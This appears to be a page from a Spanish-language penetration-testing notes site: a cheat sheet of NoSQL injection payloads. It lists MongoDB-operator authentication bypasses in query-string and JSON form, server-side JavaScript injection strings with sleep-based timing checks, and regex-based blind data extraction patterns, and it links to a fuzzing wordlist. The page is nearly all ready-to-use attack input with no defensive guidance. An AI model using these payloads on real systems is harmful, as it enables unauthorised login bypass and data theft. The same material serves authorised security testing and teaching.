NoSQL injection (NoSQLi)

Authentication bypass

Query string

username[$ne]=noexiste&password[$ne]=noexiste
username[$regex]=.*&password[$regex]=.*
username[$gt]=&password[$gt]=
username[$gte]=&password[$gte]=
username[$nin][]=noexiste&password[$nin][]=noexiste
username[$exists]=true&password[$exists]=true

$ne = not equals.
$regex = match a specified RegEx.
$gt = greater than.
$gte = greater than or equal to.
$nin = not in the specified array.

JSON

{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "noexiste"}, "password": {"$ne": "noexiste"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }

$ne = not equals.
$gt = greater than.

Server-Side JavaScript Injection (SSJI)

" || true || ""=="
' || true || ''=='
" && (sleep(5000)) || ""=="
' && (sleep(5000)) || ''=='

Data exfiltration

param[$ne]=noexiste
param[$regex]=.*
param[$gt]=''
param[$gte]=''
param[$lt]='~'
param[$lte]='~'

Blind

# query string
param[$regex]=^XYZ.*$
# JSON
{"param":{"$regex":"^XYZ.*$"}}

Server-Side JavaScript Injection (SSJI)

" || (this.param.match('^XYZ.*')) || ""=="
" || (this.param.match('^XYZ.*')) && (sleep(5000)) || ""=="

Wordlists

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Databases/NoSQL.txt

Anteriorsqlmap SiguienteXML external entity (XXE) injection

Última actualización hace 1 año

¿Te fue útil?